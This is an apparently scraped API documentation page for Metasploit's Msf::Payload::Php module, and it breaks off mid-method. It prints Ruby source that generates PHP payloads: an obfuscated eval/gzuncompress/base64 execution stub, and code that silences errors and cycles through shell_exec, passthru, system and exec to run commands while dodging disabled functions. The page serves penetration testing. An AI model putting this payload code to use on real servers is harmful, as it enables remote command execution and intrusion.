930 lines
43 KiB
HTML
930 lines
43 KiB
HTML
<!DOCTYPE html>
|
||
<html>
|
||
<head>
|
||
<meta charset="utf-8">
|
||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||
<title>
|
||
Module: Msf::Payload::Php
|
||
|
||
— Documentation by YARD 0.9.37
|
||
|
||
</title>
|
||
|
||
<link rel="stylesheet" href="../../css/style.css" type="text/css" />
|
||
|
||
<link rel="stylesheet" href="../../css/common.css" type="text/css" />
|
||
|
||
<script type="text/javascript">
|
||
pathId = "Msf::Payload::Php";
|
||
relpath = '../../';
|
||
</script>
|
||
|
||
|
||
<script type="text/javascript" charset="utf-8" src="../../js/jquery.js"></script>
|
||
|
||
<script type="text/javascript" charset="utf-8" src="../../js/app.js"></script>
|
||
|
||
|
||
</head>
|
||
<body>
|
||
<div class="nav_wrap">
|
||
<iframe id="nav" src="../../class_list.html?1"></iframe>
|
||
<div id="resizer"></div>
|
||
</div>
|
||
|
||
<div id="main" tabindex="-1">
|
||
<div id="header">
|
||
<div id="menu">
|
||
|
||
<a href="../../_index.html">Index (P)</a> »
|
||
<span class='title'><span class='object_link'><a href="../../Msf.html" title="Msf (module)">Msf</a></span></span> » <span class='title'><span class='object_link'><a href="../Payload.html" title="Msf::Payload (class)">Payload</a></span></span>
|
||
»
|
||
<span class="title">Php</span>
|
||
|
||
</div>
|
||
|
||
<div id="search">
|
||
|
||
<a class="full_list_link" id="class_list_link"
|
||
href="../../class_list.html">
|
||
|
||
<svg width="24" height="24">
|
||
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
|
||
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
|
||
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
|
||
</svg>
|
||
</a>
|
||
|
||
</div>
|
||
<div class="clear"></div>
|
||
</div>
|
||
|
||
<div id="content"><h1>Module: Msf::Payload::Php
|
||
|
||
|
||
|
||
</h1>
|
||
<div class="box_info">
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<dl>
|
||
<dt>Included in:</dt>
|
||
<dd><span class='object_link'><a href="../Exploit/PhpEXE.html" title="Msf::Exploit::PhpEXE (module)">Exploit::PhpEXE</a></span>, <span class='object_link'><a href="Php/BindTcp.html" title="Msf::Payload::Php::BindTcp (module)">BindTcp</a></span></dd>
|
||
</dl>
|
||
|
||
|
||
|
||
<dl>
|
||
<dt>Defined in:</dt>
|
||
<dd>lib/msf/core/payload/php.rb</dd>
|
||
</dl>
|
||
|
||
</div>
|
||
|
||
<h2>Defined Under Namespace</h2>
|
||
<p class="children">
|
||
|
||
|
||
<strong class="modules">Modules:</strong> <span class='object_link'><a href="Php/BindTcp.html" title="Msf::Payload::Php::BindTcp (module)">BindTcp</a></span>, <span class='object_link'><a href="Php/ReverseTcp.html" title="Msf::Payload::Php::ReverseTcp (module)">ReverseTcp</a></span>, <span class='object_link'><a href="Php/SendUUID.html" title="Msf::Payload::Php::SendUUID (module)">SendUUID</a></span>
|
||
|
||
|
||
|
||
|
||
</p>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<h2>
|
||
Class Method Summary
|
||
<small><a href="#" class="summary_toggle">collapse</a></small>
|
||
</h2>
|
||
|
||
<ul class="summary">
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#create_exec_stub-class_method" title="create_exec_stub (class method)">.<strong>create_exec_stub</strong>(php_code, options = {}) ⇒ Object </a>
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<span class="summary_desc"><div class='inline'></div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#preamble-class_method" title="preamble (class method)">.<strong>preamble</strong>(options = {}) ⇒ String </a>
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<span class="summary_desc"><div class='inline'>
|
||
<p>Generate a chunk of PHP code that should be eval’d before #php_system_block.</p>
|
||
</div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#system_block-class_method" title="system_block (class method)">.<strong>system_block</strong>(options = {}) ⇒ String </a>
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<span class="summary_desc"><div class='inline'>
|
||
<p>Generate a chunk of PHP code that tries to run a command.</p>
|
||
</div></span>
|
||
|
||
</li>
|
||
|
||
|
||
</ul>
|
||
|
||
<h2>
|
||
Instance Method Summary
|
||
<small><a href="#" class="summary_toggle">collapse</a></small>
|
||
</h2>
|
||
|
||
<ul class="summary">
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#php_create_exec_stub-instance_method" title="#php_create_exec_stub (instance method)">#<strong>php_create_exec_stub</strong>(php_code) ⇒ Object </a>
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<span class="summary_desc"><div class='inline'></div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#php_exec_cmd-instance_method" title="#php_exec_cmd (instance method)">#<strong>php_exec_cmd</strong>(cmd) ⇒ Object </a>
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<span class="summary_desc"><div class='inline'></div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#php_preamble-instance_method" title="#php_preamble (instance method)">#<strong>php_preamble</strong>(options = {}) ⇒ Object </a>
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<span class="summary_desc"><div class='inline'></div></span>
|
||
|
||
</li>
|
||
|
||
|
||
<li class="public ">
|
||
<span class="summary_signature">
|
||
|
||
<a href="#php_system_block-instance_method" title="#php_system_block (instance method)">#<strong>php_system_block</strong>(options = {}) ⇒ Object </a>
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<span class="summary_desc"><div class='inline'></div></span>
|
||
|
||
</li>
|
||
|
||
|
||
</ul>
|
||
|
||
|
||
|
||
|
||
<div id="class_method_details" class="method_details_list">
|
||
<h2>Class Method Details</h2>
|
||
|
||
|
||
<div class="method_details first">
|
||
<h3 class="signature first" id="create_exec_stub-class_method">
|
||
|
||
.<strong>create_exec_stub</strong>(php_code, options = {}) ⇒ <tt>Object</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
<pre class="lines">
|
||
|
||
|
||
168
|
||
169
|
||
170
|
||
171
|
||
172
|
||
173</pre>
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/payload/php.rb', line 168</span>
|
||
|
||
<span class='kw'>def</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_create_exec_stub'>create_exec_stub</span><span class='lparen'>(</span><span class='id identifier rubyid_php_code'>php_code</span><span class='comma'>,</span> <span class='id identifier rubyid_options'>options</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_payload'>payload</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_encode_base64'>encode_base64</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_zlib_deflate'>zlib_deflate</span><span class='lparen'>(</span><span class='id identifier rubyid_php_code'>php_code</span><span class='rparen'>)</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_b64_stub'>b64_stub</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>eval(gzuncompress(base64_decode('</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_payload'>payload</span><span class='embexpr_end'>}</span><span class='tstring_content'>')));</span><span class='tstring_end'>"</span></span>
|
||
<span class='id identifier rubyid_b64_stub'>b64_stub</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'><?php </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_b64_stub'>b64_stub</span><span class='embexpr_end'>}</span><span class='tstring_content'> ?></span><span class='tstring_end'>"</span></span> <span class='kw'>if</span> <span class='id identifier rubyid_options'>options</span><span class='period'>.</span><span class='id identifier rubyid_fetch'>fetch</span><span class='lparen'>(</span><span class='symbol'>:wrap_in_tags</span><span class='comma'>,</span> <span class='kw'>true</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_b64_stub'>b64_stub</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
<div class="method_details ">
|
||
<h3 class="signature " id="preamble-class_method">
|
||
|
||
.<strong>preamble</strong>(options = {}) ⇒ <tt>String</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><div class="docstring">
|
||
<div class="discussion">
|
||
|
||
<p>Generate a chunk of PHP code that should be eval’d before #php_system_block.</p>
|
||
|
||
<p>The generated code will initialize</p>
|
||
|
||
|
||
</div>
|
||
</div>
|
||
<div class="tags">
|
||
<p class="tag_title">Parameters:</p>
|
||
<ul class="param">
|
||
|
||
<li>
|
||
|
||
<span class='name'>options</span>
|
||
|
||
|
||
<span class='type'>(<tt>Hash</tt>)</span>
|
||
|
||
|
||
<em class="default">(defaults to: <tt>{}</tt>)</em>
|
||
|
||
|
||
—
|
||
<div class='inline'>
|
||
<p>a customizable set of options</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
</ul>
|
||
|
||
|
||
|
||
|
||
<p class="tag_title">Options Hash (<tt>options</tt>):</p>
|
||
<ul class="option">
|
||
|
||
<li>
|
||
<span class="name">:disabled_varname</span>
|
||
<span class="type">(<tt>String</tt>)</span>
|
||
<span class="default">
|
||
|
||
</span>
|
||
|
||
— <div class='inline'>
|
||
<p>PHP variable name in which to store an array of disabled functions.</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
</ul>
|
||
|
||
|
||
<p class="tag_title">Returns:</p>
|
||
<ul class="return">
|
||
|
||
<li>
|
||
|
||
|
||
<span class='type'>(<tt>String</tt>)</span>
|
||
|
||
|
||
|
||
—
|
||
<div class='inline'>
|
||
<p>A chunk of PHP code</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
</ul>
|
||
|
||
</div><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
<pre class="lines">
|
||
|
||
|
||
19
|
||
20
|
||
21
|
||
22
|
||
23
|
||
24
|
||
25
|
||
26
|
||
27
|
||
28
|
||
29
|
||
30
|
||
31
|
||
32
|
||
33
|
||
34
|
||
35
|
||
36
|
||
37
|
||
38
|
||
39</pre>
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/payload/php.rb', line 19</span>
|
||
|
||
<span class='kw'>def</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_preamble'>preamble</span><span class='lparen'>(</span><span class='id identifier rubyid_options'>options</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_vars'>vars</span> <span class='op'>=</span> <span class='id identifier rubyid_options'>options</span><span class='period'>.</span><span class='id identifier rubyid_fetch'>fetch</span><span class='lparen'>(</span><span class='symbol'>:vars_generator</span><span class='rparen'>)</span> <span class='lbrace'>{</span> <span class='const'><span class='object_link'><a href="../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>RandomIdentifier</span><span class='op'>::</span><span class='const'>Generator</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='label'>language:</span> <span class='symbol'>:php</span><span class='rparen'>)</span> <span class='rbrace'>}</span>
|
||
|
||
<span class='id identifier rubyid_dis'>dis</span> <span class='op'>=</span> <span class='id identifier rubyid_options'>options</span><span class='lbracket'>[</span><span class='symbol'>:disabled_varname</span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='id identifier rubyid_vars'>vars</span><span class='lbracket'>[</span><span class='symbol'>:disabled_varname</span><span class='rbracket'>]</span>
|
||
<span class='id identifier rubyid_dis'>dis</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>$</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_dis'>dis</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span> <span class='kw'>unless</span> <span class='id identifier rubyid_dis'>dis</span><span class='period'>.</span><span class='id identifier rubyid_start_with?'>start_with?</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>$</span><span class='tstring_end'>'</span></span><span class='rparen'>)</span>
|
||
|
||
<span class='comment'># Canonicalize the list of disabled functions to facilitate choosing a
|
||
</span> <span class='comment'># system-like function later.
|
||
</span> <span class='heredoc_beg'><<~TEXT</span>
|
||
<span class='tstring_content'> /*<?php /**/
|
||
</span><span class='tstring_content'> @error_reporting(0);@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);
|
||
</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_dis'>dis</span><span class='embexpr_end'>}</span><span class='tstring_content'>=@ini_get('disable_functions');
|
||
</span><span class='tstring_content'> if(!empty(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_dis'>dis</span><span class='embexpr_end'>}</span><span class='tstring_content'>)){
|
||
</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_dis'>dis</span><span class='embexpr_end'>}</span><span class='tstring_content'>=preg_replace('/[, ]+/',',',</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_dis'>dis</span><span class='embexpr_end'>}</span><span class='tstring_content'>);
|
||
</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_dis'>dis</span><span class='embexpr_end'>}</span><span class='tstring_content'>=explode(',',</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_dis'>dis</span><span class='embexpr_end'>}</span><span class='tstring_content'>);
|
||
</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_dis'>dis</span><span class='embexpr_end'>}</span><span class='tstring_content'>=array_map('trim',</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_dis'>dis</span><span class='embexpr_end'>}</span><span class='tstring_content'>);
|
||
</span><span class='tstring_content'> }else{
|
||
</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_dis'>dis</span><span class='embexpr_end'>}</span><span class='tstring_content'>=array();
|
||
</span><span class='tstring_content'> }
|
||
</span><span class='heredoc_end'> TEXT
|
||
</span><span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
<div class="method_details ">
|
||
<h3 class="signature " id="system_block-class_method">
|
||
|
||
.<strong>system_block</strong>(options = {}) ⇒ <tt>String</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><div class="docstring">
|
||
<div class="discussion">
|
||
|
||
<p>Generate a chunk of PHP code that tries to run a command.</p>
|
||
|
||
|
||
</div>
|
||
</div>
|
||
<div class="tags">
|
||
<p class="tag_title">Parameters:</p>
|
||
<ul class="param">
|
||
|
||
<li>
|
||
|
||
<span class='name'>options</span>
|
||
|
||
|
||
<span class='type'>(<tt>Hash</tt>)</span>
|
||
|
||
|
||
<em class="default">(defaults to: <tt>{}</tt>)</em>
|
||
|
||
|
||
—
|
||
<div class='inline'>
|
||
<p>a customizable set of options</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
</ul>
|
||
|
||
|
||
|
||
|
||
<p class="tag_title">Options Hash (<tt>options</tt>):</p>
|
||
<ul class="option">
|
||
|
||
<li>
|
||
<span class="name">:cmd_varname</span>
|
||
<span class="type">(<tt>String</tt>)</span>
|
||
<span class="default">
|
||
|
||
</span>
|
||
|
||
— <div class='inline'>
|
||
<p>PHP variable name containing the command to run</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
<li>
|
||
<span class="name">:disabled_varname</span>
|
||
<span class="type">(<tt>String</tt>)</span>
|
||
<span class="default">
|
||
|
||
</span>
|
||
|
||
— <div class='inline'>
|
||
<p>PHP variable name containing an array of disabled functions. See #php_preamble</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
<li>
|
||
<span class="name">:output_varname</span>
|
||
<span class="type">(<tt>String</tt>)</span>
|
||
<span class="default">
|
||
|
||
</span>
|
||
|
||
— <div class='inline'>
|
||
<p>PHP variable name in which to store the output of the command. Will contain 0 if no exec functions work.</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
</ul>
|
||
|
||
|
||
<p class="tag_title">Returns:</p>
|
||
<ul class="return">
|
||
|
||
<li>
|
||
|
||
|
||
<span class='type'>(<tt>String</tt>)</span>
|
||
|
||
|
||
|
||
—
|
||
<div class='inline'>
|
||
<p>A chunk of PHP code that, with a little luck, will run a command.</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
</ul>
|
||
|
||
</div><table class="source_code">
|
||
<tr>
|
||
<td>
|
||
<pre class="lines">
|
||
|
||
|
||
59
|
||
60
|
||
61
|
||
62
|
||
63
|
||
64
|
||
65
|
||
66
|
||
67
|
||
68
|
||
69
|
||
70
|
||
71
|
||
72
|
||
73
|
||
74
|
||
75
|
||
76
|
||
77
|
||
78
|
||
79
|
||
80
|
||
81
|
||
82
|
||
83
|
||
84
|
||
85
|
||
86
|
||
87
|
||
88
|
||
89
|
||
90
|
||
91
|
||
92
|
||
93
|
||
94
|
||
95
|
||
96
|
||
97
|
||
98
|
||
99
|
||
100
|
||
101
|
||
102
|
||
103
|
||
104
|
||
105
|
||
106
|
||
107
|
||
108
|
||
109
|
||
110
|
||
111
|
||
112
|
||
113
|
||
114
|
||
115
|
||
116
|
||
117
|
||
118
|
||
119
|
||
120
|
||
121
|
||
122
|
||
123
|
||
124
|
||
125
|
||
126
|
||
127
|
||
128
|
||
129
|
||
130
|
||
131
|
||
132
|
||
133
|
||
134
|
||
135
|
||
136
|
||
137
|
||
138
|
||
139
|
||
140
|
||
141
|
||
142
|
||
143
|
||
144
|
||
145
|
||
146
|
||
147
|
||
148
|
||
149
|
||
150
|
||
151
|
||
152
|
||
153
|
||
154</pre>
|
||
</td>
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/payload/php.rb', line 59</span>
|
||
|
||
<span class='kw'>def</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_system_block'>system_block</span><span class='lparen'>(</span><span class='id identifier rubyid_options'>options</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_vars'>vars</span> <span class='op'>=</span> <span class='id identifier rubyid_options'>options</span><span class='period'>.</span><span class='id identifier rubyid_fetch'>fetch</span><span class='lparen'>(</span><span class='symbol'>:vars_generator</span><span class='rparen'>)</span> <span class='lbrace'>{</span> <span class='const'><span class='object_link'><a href="../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>RandomIdentifier</span><span class='op'>::</span><span class='const'>Generator</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='label'>language:</span> <span class='symbol'>:php</span><span class='rparen'>)</span> <span class='rbrace'>}</span>
|
||
|
||
<span class='id identifier rubyid_cmd'>cmd</span> <span class='op'>=</span> <span class='id identifier rubyid_options'>options</span><span class='lbracket'>[</span><span class='symbol'>:cmd_varname</span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='id identifier rubyid_vars'>vars</span><span class='lbracket'>[</span><span class='symbol'>:cmd_varname</span><span class='rbracket'>]</span>
|
||
<span class='id identifier rubyid_dis'>dis</span> <span class='op'>=</span> <span class='id identifier rubyid_options'>options</span><span class='lbracket'>[</span><span class='symbol'>:disabled_varname</span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='id identifier rubyid_vars'>vars</span><span class='lbracket'>[</span><span class='symbol'>:disabled_varname</span><span class='rbracket'>]</span>
|
||
<span class='id identifier rubyid_output'>output</span> <span class='op'>=</span> <span class='id identifier rubyid_options'>options</span><span class='lbracket'>[</span><span class='symbol'>:output_varname</span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='id identifier rubyid_vars'>vars</span><span class='lbracket'>[</span><span class='symbol'>:output_varname</span><span class='rbracket'>]</span>
|
||
|
||
<span class='id identifier rubyid_cmd'>cmd</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>$</span><span class='tstring_end'>'</span></span> <span class='op'>+</span> <span class='id identifier rubyid_cmd'>cmd</span> <span class='kw'>unless</span> <span class='id identifier rubyid_cmd'>cmd</span><span class='period'>.</span><span class='id identifier rubyid_start_with?'>start_with?</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>$</span><span class='tstring_end'>'</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_dis'>dis</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>$</span><span class='tstring_end'>'</span></span> <span class='op'>+</span> <span class='id identifier rubyid_dis'>dis</span> <span class='kw'>unless</span> <span class='id identifier rubyid_dis'>dis</span><span class='period'>.</span><span class='id identifier rubyid_start_with?'>start_with?</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>$</span><span class='tstring_end'>'</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_output'>output</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>$</span><span class='tstring_end'>'</span></span> <span class='op'>+</span> <span class='id identifier rubyid_output'>output</span> <span class='kw'>unless</span> <span class='id identifier rubyid_output'>output</span><span class='period'>.</span><span class='id identifier rubyid_start_with?'>start_with?</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>$</span><span class='tstring_end'>'</span></span><span class='rparen'>)</span>
|
||
|
||
<span class='id identifier rubyid_is_callable'>is_callable</span> <span class='op'>=</span> <span class='id identifier rubyid_vars'>vars</span><span class='lbracket'>[</span><span class='symbol'>:is_callable_varname</span><span class='rbracket'>]</span>
|
||
<span class='id identifier rubyid_in_array'>in_array</span> <span class='op'>=</span> <span class='id identifier rubyid_vars'>vars</span><span class='lbracket'>[</span><span class='symbol'>:in_array_varname</span><span class='rbracket'>]</span>
|
||
|
||
<span class='id identifier rubyid_setup'>setup</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_end'>'</span></span>
|
||
<span class='kw'>if</span> <span class='id identifier rubyid_options'>options</span><span class='lbracket'>[</span><span class='symbol'>:cmd</span><span class='rbracket'>]</span>
|
||
<span class='id identifier rubyid_setup'>setup</span> <span class='op'><<</span> <span class='heredoc_beg'><<~TEXT</span>
|
||
<span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cmd'>cmd</span><span class='embexpr_end'>}</span><span class='tstring_content'>=base64_decode('</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_encode_base64'>encode_base64</span><span class='lparen'>(</span><span class='id identifier rubyid_options'>options</span><span class='lbracket'>[</span><span class='symbeg'>:</span><span class='id identifier rubyid_cmd'>cmd</span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>');
|
||
</span><span class='heredoc_end'> TEXT
|
||
</span> <span class='kw'>end</span>
|
||
<span class='id identifier rubyid_setup'>setup</span> <span class='op'><<</span> <span class='heredoc_beg'><<~TEXT</span>
|
||
<span class='tstring_content'> if (FALSE!==stristr(PHP_OS,'win')){
|
||
</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cmd'>cmd</span><span class='embexpr_end'>}</span><span class='tstring_content'>=</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cmd'>cmd</span><span class='embexpr_end'>}</span><span class='tstring_content'>.\" 2>&1\\n\";
|
||
</span><span class='tstring_content'> }
|
||
</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_is_callable'>is_callable</span><span class='embexpr_end'>}</span><span class='tstring_content'>='is_callable';
|
||
</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_in_array'>in_array</span><span class='embexpr_end'>}</span><span class='tstring_content'>='in_array';
|
||
</span><span class='heredoc_end'> TEXT
|
||
</span> <span class='id identifier rubyid_shell_exec'>shell_exec</span> <span class='op'>=</span> <span class='heredoc_beg'><<~TEXT</span>
|
||
<span class='tstring_content'> if(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_is_callable'>is_callable</span><span class='embexpr_end'>}</span><span class='tstring_content'>('shell_exec')&&!</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_in_array'>in_array</span><span class='embexpr_end'>}</span><span class='tstring_content'>('shell_exec',</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_dis'>dis</span><span class='embexpr_end'>}</span><span class='tstring_content'>)){
|
||
</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_output'>output</span><span class='embexpr_end'>}</span><span class='tstring_content'>=`</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cmd'>cmd</span><span class='embexpr_end'>}</span><span class='tstring_content'>`;
|
||
</span><span class='tstring_content'> }else
|
||
</span><span class='heredoc_end'> TEXT
|
||
</span> <span class='id identifier rubyid_passthru'>passthru</span> <span class='op'>=</span> <span class='heredoc_beg'><<~TEXT</span>
|
||
<span class='tstring_content'> if(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_is_callable'>is_callable</span><span class='embexpr_end'>}</span><span class='tstring_content'>('passthru')&&!</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_in_array'>in_array</span><span class='embexpr_end'>}</span><span class='tstring_content'>('passthru',</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_dis'>dis</span><span class='embexpr_end'>}</span><span class='tstring_content'>)){
|
||
</span><span class='tstring_content'> ob_start();
|
||
</span><span class='tstring_content'> passthru(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cmd'>cmd</span><span class='embexpr_end'>}</span><span class='tstring_content'>);
|
||
</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_output'>output</span><span class='embexpr_end'>}</span><span class='tstring_content'>=ob_get_contents();
|
||
</span><span class='tstring_content'> ob_end_clean();
|
||
</span><span class='tstring_content'> }else
|
||
</span><span class='heredoc_end'> TEXT
|
||
</span> <span class='id identifier rubyid_system'>system</span> <span class='op'>=</span> <span class='heredoc_beg'><<~TEXT</span>
|
||
<span class='tstring_content'> if(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_is_callable'>is_callable</span><span class='embexpr_end'>}</span><span class='tstring_content'>('system')&&!</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_in_array'>in_array</span><span class='embexpr_end'>}</span><span class='tstring_content'>('system',</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_dis'>dis</span><span class='embexpr_end'>}</span><span class='tstring_content'>)){
|
||
</span><span class='tstring_content'> ob_start();
|
||
</span><span class='tstring_content'> system(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cmd'>cmd</span><span class='embexpr_end'>}</span><span class='tstring_content'>);
|
||
</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_output'>output</span><span class='embexpr_end'>}</span><span class='tstring_content'>=ob_get_contents();
|
||
</span><span class='tstring_content'> ob_end_clean();
|
||
</span><span class='tstring_content'> }else
|
||
</span><span class='heredoc_end'> TEXT
|
||
</span> <span class='id identifier rubyid_exec'>exec</span> <span class='op'>=</span> <span class='heredoc_beg'><<~TEXT</span>
|
||
<span class='tstring_content'> if(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_is_callable'>is_callable</span><span class='embexpr_end'>}</span><span class='tstring_content'>('exec')&&!</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_in_array'>in_array</span><span class='embexpr_end'>}</span><span class='tstring_content'>('exec',</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_dis'>dis</span><span class='embexpr_end'>}</span><span class='tstring_content'>)){
|
||
</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_output'>output</span><span class='embexpr_end'>}</span><span class='tstring_content'>=array();
|
||
</span><span class='tstring_content'> exec(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cmd'>cmd</span><span class='embexpr_end'>}</span><span class='tstring_content'>,</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_output'>output</span><span class='embexpr_end'>}</span><span class='tstring_content'>);
|
||
